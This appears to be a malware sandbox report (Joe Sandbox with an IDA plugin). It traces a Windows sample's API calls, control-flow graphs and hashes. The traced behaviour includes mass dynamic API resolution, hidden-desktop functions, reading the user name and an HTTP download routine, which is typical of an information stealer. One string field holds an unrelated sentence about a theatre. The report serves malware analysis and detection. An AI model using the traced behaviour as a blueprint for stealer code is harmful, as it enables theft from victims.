                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: the same 16 dump regions (dump set 00000000.00000002, 0x300000 through 0x993000) as listed under the preceding function
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-3329630956
                                  • Opcode ID: b028fdc4049f6489d8068c248805657d34b4d25f48316169331710ab82fd5206
                                  • Instruction ID: 6047d677a34a285a8f56f5dd2d7dce558b3db0878b733f55bed653351a1be1da
                                  • Opcode Fuzzy Hash: b028fdc4049f6489d8068c248805657d34b4d25f48316169331710ab82fd5206
                                  • Instruction Fuzzy Hash: 5C31D628B8022D76C622EBEF4CC7FDF6E55DF85B60F024096F54857190CBA16581CBE2
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00322A6F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00322A76
                                  • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00322A8A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: the same 16 dump regions (dump set 00000000.00000002, 0x300000 through 0x993000) as listed under the preceding function
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: fbf2f1aa3d757f157c10cce205b76cd5791a52563ba34b353dd0f113ae099ae5
                                  • Instruction ID: 61a87018bc46733d5d055a65dedb31e62fc4a916748e15912237593efb4c222c
                                  • Opcode Fuzzy Hash: fbf2f1aa3d757f157c10cce205b76cd5791a52563ba34b353dd0f113ae099ae5
                                  • Instruction Fuzzy Hash: ACF0B4B1A44614ABC700DF88DD49B9EBBBCF704B21F000216FA15E3380D7B4190486A1

                                  Control-flow Graph (blocks by address range with their calls; the text export does not preserve the executed / not-executed colouring of the graph image)
                                  • 3266e0-3266e7: branch to 3266ed-326af9 (GetProcAddress ×43) or straight to 326afe-326b92
                                  • 326afe-326b92: LoadLibraryA ×8; then 326b94-326c03 (GetProcAddress ×5) or 326c08-326c0f
                                  • 326c08-326c0f: branch to 326c15-326ccd (GetProcAddress ×8) or 326cd2-326cd9
                                  • 326cd2-326cd9: branch to 326cdb-326d4a (GetProcAddress ×5) or 326d4f-326d56
                                  • 326d4f-326d56: branch to 326d5c-326de4 (GetProcAddress ×6) or 326de9-326df0
                                  • 326de9-326df0: branch to 326df6-326f0b (GetProcAddress ×12) or 326f10-326f17
                                  • 326f10-326f17: branch to 326f19-326f88 (GetProcAddress ×5) or 326f8d-326f94
                                  • 326f8d-326f94: branch to 326f96-326fbc (GetProcAddress ×2) or 326fc1-326fc8
                                  • 326fc1-326fc8: branch to 326fca-326ff0 (GetProcAddress ×2) or 326ff5-326ffc
                                  • 326ff5-326ffc: branch to 327002-3270e8 (GetProcAddress ×10) or 3270ed-3270f4
                                  • 3270ed-3270f4: branch to 3270f6-32714d (GetProcAddress ×4) or 327152-327159
                                  • 327152-327159: branch to 32715b-327169 (GetProcAddress) or 32716e-327175
                                  • 32716e-327175: branch to 327177-3271ce (GetProcAddress ×4) or 3271d3 (end of graph)
                                  This is the same shape as 326390 on a larger scale: 107 GetProcAddress calls in 13 groups, each group guarded by a short branch block, with the first 43 against the handle already in use before the 8 LoadLibraryA calls and the remaining groups against the handles those calls return (the API list below shows 75FD0000, 734B0000 and 763B0000 for the next three groups).
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,01016720), ref: 003266F5
                                  • GetProcAddress.KERNEL32(75900000,01016940), ref: 0032670D
                                  • GetProcAddress.KERNEL32(75900000,01028EF8), ref: 00326726
                                  • GetProcAddress.KERNEL32(75900000,01028F28), ref: 0032673E
                                  • GetProcAddress.KERNEL32(75900000,0102CC48), ref: 00326756
                                  • GetProcAddress.KERNEL32(75900000,0102CCF0), ref: 0032676F
                                  • GetProcAddress.KERNEL32(75900000,0101AF00), ref: 00326787
                                  • GetProcAddress.KERNEL32(75900000,0102CED0), ref: 0032679F
                                  • GetProcAddress.KERNEL32(75900000,0102CC00), ref: 003267B8
                                  • GetProcAddress.KERNEL32(75900000,0102CCA8), ref: 003267D0
                                  • GetProcAddress.KERNEL32(75900000,0102CCD8), ref: 003267E8
                                  • GetProcAddress.KERNEL32(75900000,01016700), ref: 00326801
                                  • GetProcAddress.KERNEL32(75900000,01016A20), ref: 00326819
                                  • GetProcAddress.KERNEL32(75900000,01016760), ref: 00326831
                                  • GetProcAddress.KERNEL32(75900000,010167C0), ref: 0032684A
                                  • GetProcAddress.KERNEL32(75900000,0102CD68), ref: 00326862
                                  • GetProcAddress.KERNEL32(75900000,0102CE58), ref: 0032687A
                                  • GetProcAddress.KERNEL32(75900000,0101B158), ref: 00326893
                                  • GetProcAddress.KERNEL32(75900000,01016920), ref: 003268AB
                                  • GetProcAddress.KERNEL32(75900000,0102CD08), ref: 003268C3
                                  • GetProcAddress.KERNEL32(75900000,0102CC18), ref: 003268DC
                                  • GetProcAddress.KERNEL32(75900000,0102CEE8), ref: 003268F4
                                  • GetProcAddress.KERNEL32(75900000,0102CC30), ref: 0032690C
                                  • GetProcAddress.KERNEL32(75900000,01016960), ref: 00326925
                                  • GetProcAddress.KERNEL32(75900000,0102CD20), ref: 0032693D
                                  • GetProcAddress.KERNEL32(75900000,0102CC60), ref: 00326955
                                  • GetProcAddress.KERNEL32(75900000,0102CE40), ref: 0032696E
                                  • GetProcAddress.KERNEL32(75900000,0102CE70), ref: 00326986
                                  • GetProcAddress.KERNEL32(75900000,0102CD80), ref: 0032699E
                                  • GetProcAddress.KERNEL32(75900000,0102CDE0), ref: 003269B7
                                  • GetProcAddress.KERNEL32(75900000,0102CE10), ref: 003269CF
                                  • GetProcAddress.KERNEL32(75900000,0102CE88), ref: 003269E7
                                  • GetProcAddress.KERNEL32(75900000,0102CC78), ref: 00326A00
                                  • GetProcAddress.KERNEL32(75900000,01029E18), ref: 00326A18
                                  • GetProcAddress.KERNEL32(75900000,0102CEA0), ref: 00326A30
                                  • GetProcAddress.KERNEL32(75900000,0102CD98), ref: 00326A49
                                  • GetProcAddress.KERNEL32(75900000,010169A0), ref: 00326A61
                                  • GetProcAddress.KERNEL32(75900000,0102CD38), ref: 00326A79
                                  • GetProcAddress.KERNEL32(75900000,010166A0), ref: 00326A92
                                  • GetProcAddress.KERNEL32(75900000,0102CC90), ref: 00326AAA
                                  • GetProcAddress.KERNEL32(75900000,0102CEB8), ref: 00326AC2
                                  • GetProcAddress.KERNEL32(75900000,010162E0), ref: 00326ADB
                                  • GetProcAddress.KERNEL32(75900000,01016520), ref: 00326AF3
                                  • LoadLibraryA.KERNEL32(0102CCC0,0032051F), ref: 00326B05
                                  • LoadLibraryA.KERNEL32(0102CDB0), ref: 00326B16
                                  • LoadLibraryA.KERNEL32(0102CD50), ref: 00326B28
                                  • LoadLibraryA.KERNEL32(0102CDC8), ref: 00326B3A
                                  • LoadLibraryA.KERNEL32(0102CDF8), ref: 00326B4B
                                  • LoadLibraryA.KERNEL32(0102CE28), ref: 00326B5D
                                  • LoadLibraryA.KERNEL32(0102CF18), ref: 00326B6F
                                  • LoadLibraryA.KERNEL32(0102CFC0), ref: 00326B80
                                  • GetProcAddress.KERNEL32(75FD0000,01016480), ref: 00326B9C
                                  • GetProcAddress.KERNEL32(75FD0000,0102D050), ref: 00326BB4
                                  • GetProcAddress.KERNEL32(75FD0000,010289F0), ref: 00326BCD
                                  • GetProcAddress.KERNEL32(75FD0000,0102D098), ref: 00326BE5
                                  • GetProcAddress.KERNEL32(75FD0000,010162A0), ref: 00326BFD
                                  • GetProcAddress.KERNEL32(734B0000,0101B1A8), ref: 00326C1D
                                  • GetProcAddress.KERNEL32(734B0000,010162C0), ref: 00326C35
                                  • GetProcAddress.KERNEL32(734B0000,0101AFC8), ref: 00326C4E
                                  • GetProcAddress.KERNEL32(734B0000,0102CF90), ref: 00326C66
                                  • GetProcAddress.KERNEL32(734B0000,0102D038), ref: 00326C7E
                                  • GetProcAddress.KERNEL32(734B0000,01016460), ref: 00326C97
                                  • GetProcAddress.KERNEL32(734B0000,01016580), ref: 00326CAF
                                  • GetProcAddress.KERNEL32(734B0000,0102D008), ref: 00326CC7
                                  • GetProcAddress.KERNEL32(763B0000,01016640), ref: 00326CE3
                                  • GetProcAddress.KERNEL32(763B0000,01016300), ref: 00326CFB
                                  • GetProcAddress.KERNEL32(763B0000,0102D068), ref: 00326D14
                                  • GetProcAddress.KERNEL32(763B0000,0102D080), ref: 00326D2C
                                  • GetProcAddress.KERNEL32(763B0000,01016320), ref: 00326D44
                                  • GetProcAddress.KERNEL32(750F0000,0101B180), ref: 00326D64
                                  • GetProcAddress.KERNEL32(750F0000,0101AF28), ref: 00326D7C
                                  • GetProcAddress.KERNEL32(750F0000,0102CF30), ref: 00326D95
                                  • GetProcAddress.KERNEL32(750F0000,01016380), ref: 00326DAD
                                  • GetProcAddress.KERNEL32(750F0000,010163A0), ref: 00326DC5
                                  • GetProcAddress.KERNEL32(750F0000,0101AFF0), ref: 00326DDE
                                  • GetProcAddress.KERNEL32(75A50000,0102D020), ref: 00326DFE
                                  • GetProcAddress.KERNEL32(75A50000,010164A0), ref: 00326E16
                                  • GetProcAddress.KERNEL32(75A50000,01028A10), ref: 00326E2F
                                  • GetProcAddress.KERNEL32(75A50000,0102CFD8), ref: 00326E47
                                  • GetProcAddress.KERNEL32(75A50000,0102D0B0), ref: 00326E5F
                                  • GetProcAddress.KERNEL32(75A50000,010163C0), ref: 00326E78
                                  • GetProcAddress.KERNEL32(75A50000,010164E0), ref: 00326E90
                                  • GetProcAddress.KERNEL32(75A50000,0102CF00), ref: 00326EA8
                                  • GetProcAddress.KERNEL32(75A50000,0102CF48), ref: 00326EC1
                                  • GetProcAddress.KERNEL32(75A50000,CreateDesktopA), ref: 00326ED7
                                  • GetProcAddress.KERNEL32(75A50000,OpenDesktopA), ref: 00326EEE
                                  • GetProcAddress.KERNEL32(75A50000,CloseDesktop), ref: 00326F05
                                  • GetProcAddress.KERNEL32(75070000,010163E0), ref: 00326F21
                                  • GetProcAddress.KERNEL32(75070000,0102CFA8), ref: 00326F39
                                  • GetProcAddress.KERNEL32(75070000,0102CF60), ref: 00326F52
                                  • GetProcAddress.KERNEL32(75070000,0102CF78), ref: 00326F6A
                                  • GetProcAddress.KERNEL32(75070000,0102CFF0), ref: 00326F82
                                  • GetProcAddress.KERNEL32(74E50000,01016540), ref: 00326F9E
                                  • GetProcAddress.KERNEL32(74E50000,010164C0), ref: 00326FB6
                                  • GetProcAddress.KERNEL32(75320000,01016500), ref: 00326FD2
                                  • GetProcAddress.KERNEL32(75320000,0102C990), ref: 00326FEA
                                  • GetProcAddress.KERNEL32(6F060000,01016340), ref: 0032700A
                                  • GetProcAddress.KERNEL32(6F060000,01016620), ref: 00327022
                                  • GetProcAddress.KERNEL32(6F060000,010165E0), ref: 0032703B
                                  • GetProcAddress.KERNEL32(6F060000,0102CA08), ref: 00327053
                                  • GetProcAddress.KERNEL32(6F060000,01016600), ref: 0032706B
                                  • GetProcAddress.KERNEL32(6F060000,01016280), ref: 00327084
                                  • GetProcAddress.KERNEL32(6F060000,01016660), ref: 0032709C
                                  • GetProcAddress.KERNEL32(6F060000,01016360), ref: 003270B4
                                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 003270CB
                                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 003270E2
                                  • GetProcAddress.KERNEL32(74E00000,0102CA38), ref: 003270FE
                                  • GetProcAddress.KERNEL32(74E00000,01028AA0), ref: 00327116
                                  • GetProcAddress.KERNEL32(74E00000,0102CB58), ref: 0032712F
                                  • GetProcAddress.KERNEL32(74E00000,0102C900), ref: 00327147
                                  • GetProcAddress.KERNEL32(74DF0000,01016400), ref: 00327163
                                  • GetProcAddress.KERNEL32(6E100000,0102CA50), ref: 0032717F
                                  • GetProcAddress.KERNEL32(6E100000,01016560), ref: 00327197
                                  • GetProcAddress.KERNEL32(6E100000,0102C948), ref: 003271B0
                                  • GetProcAddress.KERNEL32(6E100000,0102CAE0), ref: 003271C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                  • API String ID: 2238633743-3468015613
                                  • Opcode ID: 498d8e097fd1245376f3fa5601e23e36c0f85ef0a4309777a9bec05bac484a2f
                                  • Instruction ID: 7b272e497b4c632cc989ca6d6cf40436c849c5b2746fab7e5cec66afe3ca6be0
                                  • Opcode Fuzzy Hash: 498d8e097fd1245376f3fa5601e23e36c0f85ef0a4309777a9bec05bac484a2f
                                  • Instruction Fuzzy Hash: EC622CF9A107009FD75CDF65EE8CA2637B9F7A87013108919F956C3364DAB4A808FB60
                                  APIs
                                  • lstrlen.KERNEL32(0032CFEC), ref: 0031F1D5
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031F1F1
                                  • lstrlen.KERNEL32(0032CFEC), ref: 0031F1FC
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031F215
                                  • lstrlen.KERNEL32(0032CFEC), ref: 0031F220
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031F239
                                  • lstrcpy.KERNEL32(00000000,00334FA0), ref: 0031F25E
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031F28C
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031F2C0
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031F2F0
                                  • lstrlen.KERNEL32(010169E0), ref: 0031F315
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601
                                  • Opcode ID: 4042fbf91e302cf0ca02335302780d771f40ff4b066ec1400b6b723aeee34316
                                  • Instruction ID: b87434bc791ca519223134355636f9f134578e377d53bb708c3ee85ddf54107a
                                  • Opcode Fuzzy Hash: 4042fbf91e302cf0ca02335302780d771f40ff4b066ec1400b6b723aeee34316
                                  • Instruction Fuzzy Hash: 50A285709013058FCB2ADF69D948AAAB7F5AF58314F198479E805DB3A1DB31DC86CF90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00320013
                                  • lstrlen.KERNEL32(0032CFEC), ref: 003200BD
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003200E1
                                  • lstrlen.KERNEL32(0032CFEC), ref: 003200EC
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00320110
                                  • lstrlen.KERNEL32(0032CFEC), ref: 0032011B
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0032013F
                                  • lstrlen.KERNEL32(0032CFEC), ref: 0032015A
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00320189
                                  • lstrlen.KERNEL32(0032CFEC), ref: 00320194
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003201C3
                                  • lstrlen.KERNEL32(0032CFEC), ref: 003201CE
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00320206
                                  • lstrlen.KERNEL32(0032CFEC), ref: 00320250
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00320288
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0032059B
                                  • lstrlen.KERNEL32(01016A00), ref: 003205AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003205D7
                                  • lstrcat.KERNEL32(00000000,?), ref: 003205E3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0032060E
                                  • lstrlen.KERNEL32(0102D940), ref: 00320625
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0032064C
                                  • lstrcat.KERNEL32(00000000,?), ref: 00320658
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00320681
                                  • lstrlen.KERNEL32(010169C0), ref: 00320698
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003206C9
                                  • lstrcat.KERNEL32(00000000,?), ref: 003206D5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00320706
                                  • lstrcpy.KERNEL32(00000000,01028BB0), ref: 0032074B
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 00301557
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 00301579
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 0030159B
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 003015FF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0032077F
                                  • lstrcpy.KERNEL32(00000000,0102D928), ref: 003207E7
                                  • lstrcpy.KERNEL32(00000000,010288C0), ref: 00320858
                                  • lstrcpy.KERNEL32(00000000,fplugins), ref: 003208CF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00320928
                                  • lstrcpy.KERNEL32(00000000,01028990), ref: 003209F8
                                    • Part of subcall function 003024E0: lstrcpy.KERNEL32(00000000,?), ref: 00302528
                                    • Part of subcall function 003024E0: lstrcpy.KERNEL32(00000000,?), ref: 0030254E
                                    • Part of subcall function 003024E0: lstrcpy.KERNEL32(00000000,?), ref: 00302577
                                  • lstrcpy.KERNEL32(00000000,01028830), ref: 00320ACE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00320B81
                                  • lstrcpy.KERNEL32(00000000,01028830), ref: 00320D58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID: fplugins
                                  • API String ID: 2500673778-38756186
                                  • Opcode ID: 1d819fbc697bc295c27894bff297d59ed01cf0f105e5857cea9091cdaab6c16e
                                  • Instruction ID: f39376b80d20b963e24b610ed1200f67be878dcfe2a889ee3f283069d9d96864
                                  • Opcode Fuzzy Hash: 1d819fbc697bc295c27894bff297d59ed01cf0f105e5857cea9091cdaab6c16e
                                  • Instruction Fuzzy Hash: ADE26A70A053518FD736DF29D588B6ABBE0BF88304F59896DE48D8B392DB31D845CB42

                                  Control-flow Graph (function at 306c40; legend: Executed / Not Executed)
                                  Basic blocks in address order, each with its API calls or subcalls and its successor blocks:
                                  • 2234: 306c40-306c64 call 302930 -> 2237, 2238
                                  • 2238: 306c66-306c6b -> 2237, 2239
                                  • 2239: 306c6d-306c6f lstrcpy -> 2237
                                  • 2237: 306c75-306c97 call 304bc0 -> 2242, 2243
                                  • 2242: 306c99 -> 2245
                                  • 2245: 306ca0-306ca8 -> 2243, 2245 (self-loop)
                                  • 2243: 306caa-306cba call 302930 -> 2247, 2248
                                  • 2248: 306cbc-306cc2 lstrcpy -> 2247
                                  • 2247: 306cc8-306cf5 InternetOpenA StrCmpCA -> 2249, 2250
                                  • 2249: 306cf7 -> 2250
                                  • 2250: 306cfa-306cfc -> 2251, 2252
                                  • 2251: 306d02-306d22 InternetConnectA -> 2253, 2254
                                  • 2254: 306d28-306d5d HttpOpenRequestA -> 2256, 2257
                                  • 2256: 306d63-306d65 -> 2259, 2260
                                  • 2259: 306d67-306d77 InternetSetOptionA -> 2260
                                  • 2260: 306d7d-306dad HttpSendRequestA HttpQueryInfoA -> 2263, 2264
                                  • 2264: 306daf-306dd3 call 3271e0 call 302a20 * 2 (no successors)
                                  • 2263: 306dd4-306de4 call 323d90 -> 2264, 2274
                                  • 2274: 306de6-306de8 -> 2276, 2277
                                  • 2277: 306dee-306e07 InternetReadFile -> 2276, 2280
                                  • 2280: 306e0d -> 2282
                                  • 2282: 306e10-306e15 -> 2276, 2283
                                  • 2283: 306e17-306e3d call 327310 -> 2286, 2287
                                  • 2287: 306e3f call 302a20 -> 2286
                                  • 2286: 306e44-306e51 call 302930 -> 2291, 2292
                                  • 2292: 306e53-306e57 -> 2291, 2293
                                  • 2293: 306e59-306e5b lstrcpy -> 2291
                                  • 2291: 306e61-306e8b call 302a20 InternetReadFile -> 2276, 2282
                                  • 2276: 306e8d-306e8e InternetCloseHandle -> 2257
                                  • 2257: 306e94-306e9e InternetCloseHandle -> 2253
                                  • 2253: 306ea1-306ea2 InternetCloseHandle -> 2252
                                  • 2252: 306ea8-306ebb call 302930 -> 2261, 2262
                                  • 2262: 306ebd-306ebf -> 2261, 2265
                                  • 2265: 306ec1-306ec3 lstrcpy -> 2261
                                  • 2261: 306ec9-306ee0 call 302a20 * 2 (no successors)
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00306C6F
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00306CC2
                                  • InternetOpenA.WININET(0032CFEC,00000001,00000000,00000000,00000000), ref: 00306CD5
                                  • StrCmpCA.SHLWAPI(?,0102E3A8), ref: 00306CED
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00306D15
                                  • HttpOpenRequestA.WININET(00000000,GET,?,0102DA60,00000000,00000000,-00400100,00000000), ref: 00306D50
                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00306D77
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00306D86
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00306DA5
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00306DFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00306E5B
                                  • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00306E7D
                                  • InternetCloseHandle.WININET(00000000), ref: 00306E8E
                                  • InternetCloseHandle.WININET(?), ref: 00306E98
                                  • InternetCloseHandle.WININET(00000000), ref: 00306EA2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00306EC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
